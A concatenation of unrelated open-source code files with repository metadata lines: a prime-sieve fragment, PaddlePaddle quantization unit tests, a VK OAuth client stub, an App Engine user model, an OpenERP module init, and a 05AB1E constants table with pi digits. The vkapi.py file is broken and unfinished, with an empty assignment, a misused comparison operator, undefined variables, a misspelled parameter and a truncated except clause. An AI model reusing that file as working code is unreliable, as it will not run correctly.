if boolArr[i] is True:
for j in range(i * i, n + 1, i):
# print(boolArr)
boolArr[j] = False
for i in range(2, n + 1):
if boolArr[i] is True:
print(i)
if __name__ == '__main__':
main()
| vansjyo/Hacktoberfest-2k17 | DhvanilP/sieve_of_erastothenes.py | Python | mit | 457 | 0 |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle.fluid.core as core
class TestFakeQuantizeOp(OpTest):
def setUp(self):
self.op_type = "fake_quantize_abs_max"
self.attrs = {'bit_length': 8}
self.inputs = {'X': np.random.random((124, 240)).astype("float32"), }
scale = np.max(np.abs(self.inputs['X'])).astype("float32")
self.outputs = {
'Out': np.round(self.inputs['X'] / scale * (
(1 << (self.attrs['bit_length'] - 1)) - 1)),
'OutScale': np.array(scale).astype("float32"),
}
def test_check_output(self):
self.check_output()
class TestFakeChannelWiseQuantizeOp(OpTest):
def setUp(self):
self.op_type = "fake_channel_wise_quantize_abs_max"
self.attrs = {'bit_length': 8}
self.inputs = {
'X': np.random.random((4, 3, 64, 64)).astype("float32"),
}
scales = []
for i in range(self.inputs['X'].shape[0]):
scales.append(np.max(np.abs(self.inputs['X'][i])).astype("float32"))
outputs = self.inputs['X'].copy()
for i, scale in enumerate(scales):
outputs[i] = np.round(outputs[i] / scale * (
(1 << (self.attrs['bit_length'] - 1)) - 1))
self.outputs = {
'Out': outputs,
'OutScale': np.array(scales).astype("float32"),
}
def test_check_output(self):
self.check_output()
class TestFakeQuantizeRangeAbsMaxOp(OpTest):
def setUp(self):
self.op_type = "fake_quantize_range_abs_max"
self.attrs = {
'bit_length': int(5),
'window_size': int(1),
'is_test': False
}
x = (np.random.random((8, 16, 7, 7)) - 0.5) * 10
x = x.astype("float32")
self.inputs = {
'X': x,
'Iter': np.zeros(1).astype("int64"),
'InScale': np.zeros(1).astype("float32")
}
scale = np.max(np.abs(self.inputs['X'])).astype("float32")
out_scales = np.zeros(self.attrs['window_size']).astype("float32")
out_scales[0] = scale
self.outputs = {
'Out': np.round(self.inputs['X'] / scale * (
(1 << (self.attrs['bit_length'] - 1)) - 1)),
'OutScale': scale,
'OutScales': out_scales,
}
def test_check_output(self):
self.check_output()
class TestFakeQuantizeMovingOp(OpTest):
def setUp(self):
self.op_type = "fake_quantize_moving_average_abs_max"
self.attrs = {
'bit_length': int(5),
'moving_rate': float(0.9),
'is_test': False
}
accum = np.zeros(1).astype("float32")
accum[0] = 1
state = np.zeros(1).astype("float32")
state[0] = 1
scale = np.zeros(1).astype("float32")
scale[0] = 0.001
self.inputs = {
'X': np.random.random((8, 16, 7, 7)).astype("float32"),
'InScale': scale,
'InAccum': accum,
'InState': state,
}
out_accum = np.zeros(1).astype("float32")
out_state = np.zeros(1).astype("float32")
out_scale = np.zeros(1).astype("float32")
out_accum[0] = self.attrs['moving_rate'] * accum[0] + np.max(
np.abs(self.inputs['X'])).astype("float32")
out_state[0] = self.attrs['moving_rate'] * state[0] + 1
out_scale = out_accum / out_state
self.outputs = {
'Out': np.round(self.inputs['X'] / out_scale * (
(1 << (self.attrs['bit_length'] - 1)) - 1)),
'OutAccum': out_accum,
'OutState': out_state,
'OutScale': out_scale,
}
def test_check_output(self):
self.check_output()
class TestFakeQuantizeRangeAbsMaxOp2(OpTest):
def setUp(self):
self.op_type = "fake_quantize_range_abs_max"
self.attrs = {
'bit_length': int(8),
'window_size': int(1),
'is_test': True
}
x = (np.random.random((8, 16, 7, 7)) - 0.5) * 10
x = x.astype("float32")
scale = np.max(np.abs(x)).astype("float32") - 1.0
out_scales = np.zeros(self.attrs['window_size']).astype("float32")
out_scales[0] = scale
self.inputs = {
'X': x,
'Iter': np.zeros(1).astype("int64"),
'InScale': scale.astype("float32")
}
xs = np.clip(x, -scale, scale)
qs = np.round(xs / scale * ((1 << (self.attrs['bit_length'] - 1)) - 1))
self.outputs = {
'Out': qs,
'OutScale': scale.astype("float32"),
'OutScales': out_scales,
}
def test_check_output(self):
self.check_output(no_check_set=set(['OutScale', 'OutScales']))
if __name__ == "__main__":
unittest.main()
| baidu/Paddle | python/paddle/fluid/tests/unittests/test_fake_quantize_op.py | Python | apache-2.0 | 5,508 | 0.000182 |
# vkapi.py
#
# Copyright 2016 Igor Unixoid Kolonchenko <enepunixoid@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import requests
import sys
class vkapi(object):
redirect_url = ''
scope = 0 '''Разрешение прав доступа'''
access_token = ''
client_id =
"""
https://oauth.vk.com/authorize?
client_id=1&display=page&redirect_uri=http://example.com/callback
&scope=friends&response_type=token&v=5.57&state=123456
"""
def __init__(self,_ci,_ru,_scope):
self.redirect_url == _ru
self.scope = _scope
self.client_id = _ci
def auth(login,passwd):
url = "https://oauth.vk.com/authorize"
params["client_id"] = self.client_id
params["display"] = "mobile"
params["redirecct_url"] = self.redirect_url
params["scope"] = self.scope
params["response_type"]="token"
try:
res = requests.get(url,params)
except requests.
| enep/vkbot | vkbot/vkapi.py | Python | gpl-3.0 | 1,581 | 0.033333 |
from webapp2_extras.appengine.auth.models import User
from google.appengine.ext import ndb
class User(User):
"""
Universal user model. Can be used with App Engine's default users API,
own auth or third party authentication methods (OpenID, OAuth etc).
based on https://gist.github.com/kylefinley
"""
#: Creation date.
created = ndb.DateTimeProperty(auto_now_add=True)
#: Modification date.
updated = ndb.DateTimeProperty(auto_now=True)
#: User defined unique name, also used as key_name.
# Not used by OpenID
username = ndb.StringProperty()
#: User Name
name = ndb.StringProperty()
#: User Last Name
last_name = ndb.StringProperty()
#: User email
email = ndb.StringProperty()
#: Hashed password. Only set for own authentication.
# Not required because third party authentication
# doesn't use password.
password = ndb.StringProperty()
#: User Country
country = ndb.StringProperty()
#: User TimeZone
tz = ndb.StringProperty()
#: Account activation verifies email
activated = ndb.BooleanProperty(default=False)
@classmethod
def get_by_email(cls, email):
"""Returns a user object based on an email.
:param email:
String representing the user email. Examples:
:returns:
A user object.
"""
return cls.query(cls.email == email).get()
@classmethod
def create_resend_token(cls, user_id):
entity = cls.token_model.create(user_id, 'resend-activation-mail')
return entity.token
@classmethod
def validate_resend_token(cls, user_id, token):
return cls.validate_token(user_id, 'resend-activation-mail', token)
@classmethod
def delete_resend_token(cls, user_id, token):
cls.token_model.get_key(user_id, 'resend-activation-mail', token).delete()
def get_social_providers_names(self):
social_user_objects = SocialUser.get_by_user(self.key)
result = []
# import logging
for social_user_object in social_user_objects:
# logging.error(social_user_object.extra_data['screen_name'])
result.append(social_user_object.provider)
return result
def get_social_providers_info(self):
providers = self.get_social_providers_names()
result = {'used': [], 'unused': []}
for k,v in SocialUser.PROVIDERS_INFO.items():
if k in providers:
result['used'].append(v)
else:
result['unused'].append(v)
return result
class LogVisit(ndb.Model):
user = ndb.KeyProperty(kind=User)
uastring = ndb.StringProperty()
ip = ndb.StringProperty()
timestamp = ndb.StringProperty()
class LogEmail(ndb.Model):
sender = ndb.StringProperty(
required=True)
to = ndb.StringProperty(
required=True)
subject = ndb.StringProperty(
required=True)
body = ndb.TextProperty()
when = ndb.DateTimeProperty()
class SocialUser(ndb.Model):
PROVIDERS_INFO = { # uri is for OpenID only (not OAuth)
'google': {'name': 'google', 'label': 'Google', 'uri': 'gmail.com'},
#'github': {'name': 'github', 'label': 'Github', 'uri': ''},
#'facebook': {'name': 'facebook', 'label': 'Facebook', 'uri': ''},
#'linkedin': {'name': 'linkedin', 'label': 'LinkedIn', 'uri': ''},
#'myopenid': {'name': 'myopenid', 'label': 'MyOpenid', 'uri': 'myopenid.com'},
#'twitter': {'name': 'twitter', 'label': 'Twitter', 'uri': ''},
#'yahoo': {'name': 'yahoo', 'label': 'Yahoo!', 'uri': 'yahoo.com'},
}
user = ndb.KeyProperty(kind=User)
provider = ndb.StringProperty()
uid = ndb.StringProperty()
extra_data = ndb.JsonProperty()
@classmethod
def get_by_user(cls, user):
return cls.query(cls.user == user).fetch()
@classmethod
def get_by_user_and_provider(cls, user, provider):
return cls.query(cls.user == user, cls.provider == provider).get()
@classmethod
def get_by_provider_and_uid(cls, provider, uid):
return cls.query(cls.provider == provider, cls.uid == uid).get()
@classmethod
def check_unique_uid(cls, provider, uid):
# pair (provider, uid) should be unique
test_unique_provider = cls.get_by_provider_and_uid(provider, uid)
if test_unique_provider is not None:
return False
else:
return True
@classmethod
def check_unique_user(cls, provider, user):
# pair (user, provider) should be unique
test_unique_user = cls.get_by_user_and_provider(user, provider)
if test_unique_user is not None:
return False
else:
return True
@classmethod
def check_unique(cls, user, provider, uid):
# pair (provider, uid) should be unique and pair (user, provider) should be unique
return cls.check_unique_uid(provider, uid) and cls.check_unique_user(provider, user)
@staticmethod
def open_id_providers():
return [k for k,v in SocialUser.PROVIDERS_INFO.items() if v['uri']]
| mats116/ElasticBigQuery | boilerplate/models.py | Python | lgpl-3.0 | 5,145 | 0.003304 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_move_line
import account_move_reconcile
import cash_flow_type
import cash_flow_distribution
import report
import wizard | sysadminmatmoz/odoo-clearcorp | TODO-8.0/cash_flow_report/__init__.py | Python | agpl-3.0 | 1,165 | 0.000858 |
import datetime
import math
class MethodAttribute:
"""
A method attribute is an attribute with the method and
its corresponding arity attached as parameters. It simply acts
as a tuple for easy access
"""
def __init__(self, method, arity):
self.method = method
self.arity = arity
constants = {
"ža": MethodAttribute(
lambda: int(datetime.datetime.now().hour),
arity=0
),
"žb": MethodAttribute(
lambda: int(datetime.datetime.now().minute),
arity=0
),
"žc": MethodAttribute(
lambda: int(datetime.datetime.now().second),
arity=0
),
"žd": MethodAttribute(
lambda: int(datetime.datetime.now().microsecond),
arity=0
),
"že": MethodAttribute(
lambda: int(datetime.datetime.now().day),
arity=0
),
"žf": MethodAttribute(
lambda: int(datetime.datetime.now().month),
arity=0
),
"žg": MethodAttribute(
lambda: int(datetime.datetime.now().year),
arity=0
),
"žh": MethodAttribute(
lambda: "0123456789",
arity=0
),
"ži": MethodAttribute(
lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",
arity=0
),
"žj": MethodAttribute(
lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_",
arity=0
),
"žk": MethodAttribute(
lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA",
arity=0
),
"žl": MethodAttribute(
lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210_",
arity=0
),
"žm": MethodAttribute(
lambda: "9876543210",
arity=0
),
"žn": MethodAttribute(
lambda: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
arity=0
),
"žo": MethodAttribute(
lambda: "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba",
arity=0
),
"žp": MethodAttribute(
lambda: "ZYXWVUTSRQPONMLKJIHGFEDCBA",
arity=0
),
"žq": MethodAttribute(
lambda: math.pi,
arity=0
),
"žr": MethodAttribute(
lambda: math.e,
arity=0
),
"žs": MethodAttribute(
lambda x: constant_pi[0:int(x) + 2],
arity=1
),
"žt": MethodAttribute(
lambda x: constant_e[0:int(x) + 2],
arity=1
),
"žu": MethodAttribute(
lambda: "()<>[]{}",
arity=0
),
"žv": MethodAttribute(
lambda: 16,
arity=0
),
"žw": MethodAttribute(
lambda: 32,
arity=0
),
"žx": MethodAttribute(
lambda: 64,
arity=0
),
"žy": MethodAttribute(
lambda: 128,
arity=0
),
"žz": MethodAttribute(
lambda: 256,
arity=0
),
"žA": MethodAttribute(
lambda: 512,
arity=0
),
"žB": MethodAttribute(
lambda: 1024,
arity=0
),
"žC": MethodAttribute(
lambda: 2048,
arity=0
),
"žD": MethodAttribute(
lambda: 4096,
arity=0
),
"žE": MethodAttribute(
lambda: 8192,
arity=0
),
"žF": MethodAttribute(
lambda: 16384,
arity=0
),
"žG": MethodAttribute(
lambda: 32768,
arity=0
),
"žH": MethodAttribute(
lambda: 65536,
arity=0
),
"žI": MethodAttribute(
lambda: 2147483648,
arity=0
),
"žJ": MethodAttribute(
lambda: 4294967296,
arity=0
),
"žK": MethodAttribute(
lambda: "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
arity=0
),
"žL": MethodAttribute(
lambda: "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210",
arity=0
),
"žM": MethodAttribute(
lambda: "aeiou",
arity=0
),
"žN": MethodAttribute(
lambda: "bcdfghjklmnpqrstvwxyz",
arity=0
),
"žO": MethodAttribute(
lambda: "aeiouy",
arity=0
),
"žP": MethodAttribute(
lambda: "bcdfghjklmnpqrstvwxz",
arity=0
),
"žQ": MethodAttribute(
lambda: " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~",
arity=0
),
"žR": MethodAttribute(
lambda: "ABC",
arity=0
),
"žS": MethodAttribute(
lambda: "qwertyuiop",
arity=0
),
"žT": MethodAttribute(
lambda: "asdfghjkl",
arity=0
),
"žU": MethodAttribute(
lambda: "zxcvbnm",
arity=0
),
"žV": MethodAttribute(
lambda: ["qwertyuiop", "asdfghjkl", "zxcvbnm"],
arity=0
),
"žW": MethodAttribute(
lambda: "qwertyuiopasdfghjklzxcvbnm",
arity=0
),
"žX": MethodAttribute(
lambda: "qwertyuiopasdfghjklzxcvbnm",
arity=0
),
"т": MethodAttribute(
lambda: 100,
arity=0
),
"₁": MethodAttribute(
lambda: 256,
arity=0
),
"₂": MethodAttribute(
lambda: 26,
arity=0
),
"₃": MethodAttribute(
lambda: 95,
arity=0
),
"₄": MethodAttribute(
lambda: 1000,
arity=0
)
}
class ConstantsInvoker:
def __init__(self):
self.commands_list = constants
def invoke_command(self, command, *args):
"""
Invokes the command passed through the argument and computes the desired
result using the rest of the arguments as args for the method
:param command: A string representation of the 05AB1E command
:param args: The arguments that will be passed on the method
:return: Any variable, determined by the corresponding method
"""
current_method = self.commands_list.get(command)
result = current_method.method(*args)
return result
constant_pi = "3.141592653589793238462643383279502884197169399375105820974944"\
"92307816406286208998628034825342117067982148086513282306647093"\
"44609550582231725359408128481117450284102701938521105559644622"\
"48954930381964428810975665933446128475648233786783165271201909"\
"45648566923460348610454326648213393607260249141273724587006606"\
"15588174881520920962829254091715364367892590360011330530548820"\
"66521384146951941511609433057270365759591953092186117381932611"\
"93105118548074462379962749567351885752724891227938183011949129"\
"33673362440656643086021394946395224737190702179860943702770539"\
"17176293176752384674818467669405132000568127145263560827785771"\
"42757789609173637178721468440901224953430146549585371050792279"\
"89258923542019956112129021960864034418159813629774771309960518"\
"07211349999998372978049951059731732816096318595024459455346908"\
"02642522308253344685035261931188171010003137838752886587533208"\
"81420617177669147303598253490428755468731159562863882353787593"\
"51957781857780532171226806613001927876611195909216420198938095"\
"57201065485863278865936153381827968230301952035301852968995773"\
"22599413891249721775283479131515574857242454150695950829533116"\
"61727855889075098381754637464939319255060400927701671139009848"\
"24012858361603563707660104710181942955596198946767837449448255"\
"79774726847104047534646208046684259069491293313677028989152104"\
"52162056966024058038150193511253382430035587640247496473263914"\
"99272604269922796782354781636009341721641219924586315030286182"\
"74555706749838505494588586926995690927210797509302955321165344"\
"87202755960236480665499119881834797753566369807426542527862551"\
"18417574672890977772793800081647060016145249192173217214772350"\
"41441973568548161361157352552133475741849468438523323907394143"\
"34547762416862518983569485562099219222184272550254256887671790"\
"94601653466804988627232791786085784383827967976681454100953883"\
"86360950680064225125205117392984896084128488626945604241965285"\
"22210661186306744278622039194945047123713786960956364371917287"\
"67764657573962413890865832645995813390478027590099465764078951"\
"69468398352595709825822620522489407726719478268482601476990902"\
"40136394437455305068203496252451749399651431429809190659250937"\
"21696461515709858387410597885959772975498930161753928468138268"\
"83868942774155991855925245953959431049972524680845987273644695"\
"48653836736222626099124608051243884390451244136549762780797715"\
"91435997700129616089441694868555848406353422072225828488648158"\
"56028506016842739452267467678895252138522549954666727823986456"\
"96116354886230577456498035593634568174324112515076069479451096"\
"96094025228879710893145669136867228748940560101503308617928680"\
"20874760917824938589009714909675985261365549781893129784821682"\
"98948722658804857564014270477555132379641451523746234364542858"\
"44795265867821051141354735739523113427166102135969536231442952"\
"84937187110145765403590279934403742007310578539062198387447808"\
"78489683321445713868751943506430218453191048481005370614680674"\
"19278191197939952061419663428754440643745123718192179998391015"\
"19561814675142691239748940907186494231961567945208095146550225"\
"31603881930142093762137855956638937787083039069792077346722182"\
"62599661501421503068038447734549202605414665925201497442850732"\
"18666002132434088190710486331734649651453905796268561005508106"\
"58796998163574736384052571459102897064140110971206280439039759"\
"15677157700420337869936007230558763176359421873125147120532928"\
"91826186125867321579198414848829164470609575270695722091756711"\
"72291098169091528017350671274858322287183520935396572512108357"\
"15136988209144421006751033467110314126711136990865851639831501"\
"70165151168517143765761835155650884909989859982387345528331635"\
"07647918535893226185489632132933089857064204675259070915481416"\
"49859461637180270981994309924488957571282890592323326097299712"\
"84433573265489382391193259746366730583604142813883032038249037"\
"89852437441702913276561809377344403070746921120191302033038019"\
"62110110044929321516084244485963766983895228684783123552658213"\
"44957685726243344189303968642624341077322697802807318915441101"\
"44682325271620105265227211166039666557309254711055785376346682"\
"65310989652691862056476931257058635662018558100729360659876486"\
"17910453348850346113657686753249441668039626579787718556084552"\
"65412665408530614344431858676975145661406800700237877659134401"\
"12749470420562230538994561314071127000407854733269939081454664"\
"45880797270826683063432858785698305235808933065757406795457163"\
"75254202114955761581400250126228594130216471550979259230990796"\
"47376125517656751357517829666454779174501129961489030463994713"\
"96210734043751895735961458901938971311179042978285647503203198"\
"91514028708085990480109412147221317947647772622414254854540332"\
"57185306142288137585043063321751829798662237172159160771669254"\
"48738986654949450114654062843366393790039769265672146385306736"\
"96571209180763832716641627488880078692560290228472104031721186"\
"82041900042296617119637792133757511495950156604963186294726547"\
"64252308177036751590673502350728354056704038674351362222477158"\
"15049530984448933309634087807693259939780541934144737744184263"\
"29860809988868741326047215695162396586457302163159819319516735"\
"81297416772947867242292465436680098067692823828068996400482435"\
"03701416314965897940924323789690706977942236250822168895738379"\
"62300159377647165122893578601588161755782973523344604281512627"\
"03734314653197777416031990665541876397929334419521541341899485"\
"44734567383162499341913181480927777103863877343177207545654532"\
"07770921201905166096280490926360197598828161332316663652861932"\
"68633606273567630354477628035045077723554710585954870279081435"\
"24014517180624643626794561275318134078330336254232783944975382"\
"37205835311477119926063813346776879695970309833913077109870408"\
"91337464144282277263465947047458784778720192771528073176790770"\
"15721344473060570073349243693113835049316312840425121925651798"\
"69411352801314701304781643788518529092854520116583934196562134"\
"14341595625865865570552690496520985803385072242648293972858478"\
"16305777756068887644624824685792603953527734803048029005876075"\
"25104747091643961362676044925627420420832085661190625454337213"\
"53595845068772460290161876679524061634252257719542916299193064"\
"53779914037340432875262888963995879475729174642635745525407909"\
"45135711136941091193932519107602082520261879853188770584297259"\
"67781314969900901921169717372784768472686084900337702424291651"\
"00500516832336435038951702989392233451722013812806965011784408"\
"45196012122859937162313017114448464090389064495444006198690754"\
"51602632750529834918740786680881833851022833450850486082503930"\
"13321971551843063545500766828294930413776552793975175461395398"\
"68339363830474611996653858153842056853386218672523340283087112"\
"28278921250771262946322956398989893582116745627010218356462201"\
"49671518819097303811980049734072396103685406643193950979019069"\
"63955245300545058068550195673022921913933918568034490398205955"\
"00226353536192041994745538593810234395544959778377902374216172"\
"11172364343543947822181852862408514006660443325888569867054315"\
"70696574745855033232334210730154594051655379068662733379958511"\
"62578432298827372319898757141595781119635833005940873068121602"\
"76496286744604774649159950549737425626901049037781986835938146"\
"74126804925648798556145372347867330390468838343634655379498641"\
"27056387293174872332083760112302991136793862708943879936201629"\
"15413371424892830722012690147546684765357616477379467520049075"\
"15552781965362132392640616013635815590742202020318727760527721"\
"00556148425551879253034351398442532234157623361064250639049750"\
"86562710953591946589751413103482276930624743536325691607815478"\
"81152843667957061108615331504452127473924544945423682886061340"\
"41486377670096120715124914043027253860764823634143346235189757"\
"64521641376796903149501910857598442391986291642193994907236234"\
"46844117394032659184044378051333894525742399508296591228508555"\
"21572503107125701266830240292952522011872676756220415420516184"\
"63484756516999811614101002996078386909291603028840026910414079"\
"88621507842451670908700069928212066041837180653556725253256753"\
"86129104248776182582976515795984703562226293486003415872298053"\
"98965022629174878820273420922224533985626476691490556284250391"\
"75771028402799806636582548892648802545661017296702664076559042"\
"09945681506526530537182941270336931378517860904070866711496558"\
"43434769338578171138645587367812301458768712660348913909562009"\
"39361031029161615288138437909904231747336394804575931493140529"\
"63475748119356709110137751721008031559024853090669203767192203"\
"22909433467685142214477379393751703443661991040337511173547191"\
"55046449026365512816228824462575916333039107225383742182140883"\
"08657391771509682887478265699599574490661758344137522397096834"\
"80053559849175417381883999446974867626551658276584835884531427"\
"56879002909517028352971634456212964043523117600665101241200659"\
"55851276178583829204197484423608007193045761893234922927965019"\
"75187212726750798125547095890455635792122103334669749923563025"\
"94780249011419521238281530911407907386025152274299581807247162"\
"91668545133312394804947079119153267343028244186041426363954800"\
"44800267049624820179289647669758318327131425170296923488962766"\
"44032326092752496035799646925650493681836090032380929345958897"\
"69536534940603402166544375589004563288225054525564056448246515"\
"87547119621844396582533754388569094113031509526179378002974120"\
"66514793942590298969594699556576121865619673378623625612521632"\
"86286922210327488921865436480229678070576561514463204692790682"\
"20738837781423356282360896320806822246801224826117718589638140"\
"18390367367222088832151375560037279839400415297002878307667094"\
"47456013455641725437090697939612257142989467154357846878861444"\
"81231459357198492252847160504922124247014121478057345510500801"\
"08699603302763478708108175450119307141223390866393833952942578"\
"90507643100638351983438934159613185434754649556978103829309716"\
"65143840700707360411237359984345225161050702705623526601276484"\
"30840761183013052793205427462865403603674532865105706587488225"\
"98157936789766974220575059683440869735020141020672358502007245"\
"25632651341055924019027421624843914035998953539459094407046912"\
"91409387001264560016237428802109276457931065792295524988727584"\
"10126483699989225695968815920560010165525637567856672279661988"\
"78279484885583439751874454551296563443480396642055798293680435"\
"20277098429423253302257634180703947699415979159453006975214829"\
"36655566156787364005366656416547321704390352132954352916941459"\
"04160875320186837937023488868947915107163785290234529244077365"\
"49563051007421087142613497459561513849871375704710178795731042"\
"96906667021449863746459528082436944578977233004876476524133907"\
"92043401963403911473202338071509522201068256342747164602433544"\
"05152126693249341967397704159568375355516673027390074972973635"\
"96453328886984406119649616277344951827369558822075735517665158"\
"85519098666539354948106887320685990754079234240230092590070173"\
"96036225475647894064754834664776041146323390565134330684495397"\
"07090302346046147096169688688501408347040546074295869913829668"\
"46818571031887906528703665083243197440477185567893482308943106"\
"28702722809736248093996270607472645539925399442808113736943388"\
"29406307926159599546262462970706259484556903471197299640908941"\
"05953439325123623550813494900436427852713831591256898929519642"\
"28757394691427253436694153236100453730488198551706594121735246"\
"58954873016760029886592578662856124966552353382942878542534048"\
"08330701653722856355915253478445981831341129001999205981352205"\
"17336585640782648494276441137639386692480311836445369858917544"\
"64739988228462184490087776977631279572267265556259628254276531"\
"30013407092233436577916012809317940171859859993384923549564005"\
"09955856113498025249906698423301735035804408116855265311709957"\
"89942732870925848789443646005041089226691783525870785951298344"\
"72953519537885534573742608590290817651557803905946408735061232"\
"61120093731080485485263572282576820341605048466277504500312620"\
"80079980492548534694146977516493270950493463938243222718851597"\
"05470214828971117779237612257887347718819682546298126868581705"\
"74027255026332904497627789442362167411918626943965067151577958"\
"75648239939176042601763387045499017614364120469218237076488783"\
"19689686118155815873606293860381017121585527266830082383404656"\
"75880405138080163363887421637140643549556186896411228214075330"\
"65510042410489678352858829024367090488711819090949453314421828"\
"66181031007354770549815968077200947469613436092861484941785017"\
"80779306810854690009445899527942439813921350558642219648349151"\
"63901280383200109773868066287792397180146134324457264009737425"\
"00735921003154150893679300816998053652027600727749674584002836"\
"40534603726341655425902760183484030681138185510597970566400750"\
"42608788573579603732451414678670368809880609716425849759513806"\
"30944940151542222194329130217391253835591503100333032511174915"\
"96917450271494331515588540392216409722910112903552181576282328"\
"18234254832611191280092825256190205263016391147724733148573910"\
"77587442538761174657867116941477642144111126358355387136101102"\
"26798775641024682403226483464176636980663785768134920453022408"\
"97278564719839630878154322116691224641591177673225326433568614"\
"18654522268126887268445968442416107854016768142080885028005414"\
"61314623082102594173756238994207571362751674573189189456283525"\
"04413354375857534269869947254703165661399199968262824727064133"\
"22217892390317608542894373393561889165125042440400895271983787"\
"86480584726895462438823437517885201439560057104811949884239060"\
"13695734231559079670346149143447886360410318235073650277859089"\
"57827273130504889398900992391350337325085598265586708924261242"\
"47367019390772713070686917092646254842324074855036608013604668"\
"51184009366860954632500214585293095000090715105823626729326453"\
"38210493872499669933942468551648326113414611068026744663733437"\
"34076429402668297386522093570162638464852851490362932019919968"\
"28517183953669134522244470804592396602817156551565666111359823"\
"12250628905854914509715755390024393153519090210711945730024388"\
"17661503527086260253788179751947806101371500448991721002220133"\
"01310601639154158957803711779277522597874289191791552241718958"\
"36168059474123419339842021874564925644346239253195313510331147"\
"39491199507285843065836193536932969928983791494193940608572486"\
"96883690326556436421664425760791471086998431573374964883529276"\
"32822076294728238153740996154559879825989109371712621828302584"\
"11238901196822142945766758071865380650648702613389282299497257"\
"53033283896381843944770779402284359883410035838542389735424395"\
"47555684095224844554139239410001620769363684677641301781965937"\
"97155746854194633489374843912974239143365936041003523437770658"\
"86778113949861647874714079326385873862473288964564359877466763"\
"47946650407411182565837887845485814896296127399841344272608606"\
"87245545236064315371011274680977870446409475828034876975894832"\
"24123929296058294861919667091895808983320121031843034012849511"\
"20353428014412761728583024355983003204202451207287253558119584"\
"14918096925339507577840006746552603144616705082768277222353419"\
"10263416315714740612385042584598841990761128725805911393568960"\
"43166828317632356732541707342081733223046298799280490851409479"\
"36887868789493054695570307261900950207643349335910602454508645"\
"62893545686295853131533718386826561786227363716975774183023986"\
"06591481616404944965011732131389574706208847480236537103115089"\
"42799275442685327797431139514357417221975979935968525228574526"\
"79628961269157235798662057340837576687388426640599099350500081"\
"37543245463596750484423528487470144354541957625847356421619813"\
"07346854111766883118654489377697956651727966232671481033864391"\
"75186594673002443450054499539974237232871249483470604406347160"\
"32583064982979551010954183623503030945309733583446283947630477"\
"64501500850757894954893139394489921612552559770143685894358587"\
"52637962559708167764380012543650237141278346792610199558522471"\
"22017772370041780841942394872540680155603599839054898572354674"\
"64239058585021671903139526294455439131663134530893906204678438"\
"78505423939052473136201294769187497519101147231528932677253391"\
"14660730008902776896311481090220972452075916729700785058071718"\
"38105496797310016787085069420709223290807038326345345203802786"\
"99055690013413718236837099194951648960075504934126787643674638"\
"90206396401976668559233565463913836318574569814719621084108096"\
"88460545603903845534372914144651347494078488442377217515433426"\
"30669883176833100113310869042193903108014378433415137092435301"\
"67763108491351615642269847507430329716746964066653152703532546"\
"11266752246055119958183196376370761799191920357958200759560530"\
"34626775794393630746305690108011494271410093913691381072581378"\
"35789400559950018354251184172136055727522103526803735726527922"\
"17373605751127887218190844900617801388971077082293100279766593"\
"83875890939568814856026322439372656247277603789081445883785501"\
"70284377936240782505270487581647032458129087839523245323789602"\
"84166922548964971560698119218658492677040395648127810217991321"\
"41630581055459880130048456299765112124153637451500563507012781"\
"92671424134210330156616535602473380784302865525722275304999883"\
"01534879300806260180962381516136690334111138653851091936739383"\
"22934588832255088706450753947395204396807906708680644509698654"\
"80168287434378612645381583428075306184548590379821799459968115"\
"41974253634439960290251001588827216474500682070419376158454712"\
"18346007262933955054823955713725684023226821301247679452264482"\
"91023564775272308208106351889915269288910845557112660396503439"\
"89627825001611015323516051965590421184494990778999200732947690"\
"86857787872098290135295661397888486050978608595701773129815531"\
"95168146717695976099421003618355913877781769845875810446628399"\
"80600616229848616935337386578773598336161338413385368421197893"\
"90018529569196780455448285848370117096721253533875862158231013"\
"10387766827211572694951817958975469399264219791552338576623167"\
"27547570354699414892904130186386119439196283887054367774322427"\
"80913236544948536676800000106526248547305586159899914017076983"\
"54831887501429389089950685453076511680333732226517566220752695"\
"79144225280816517166776672793035485154204023817460892328391703"\
"75425750867655117859395002793389592057668278967764453184040418"\
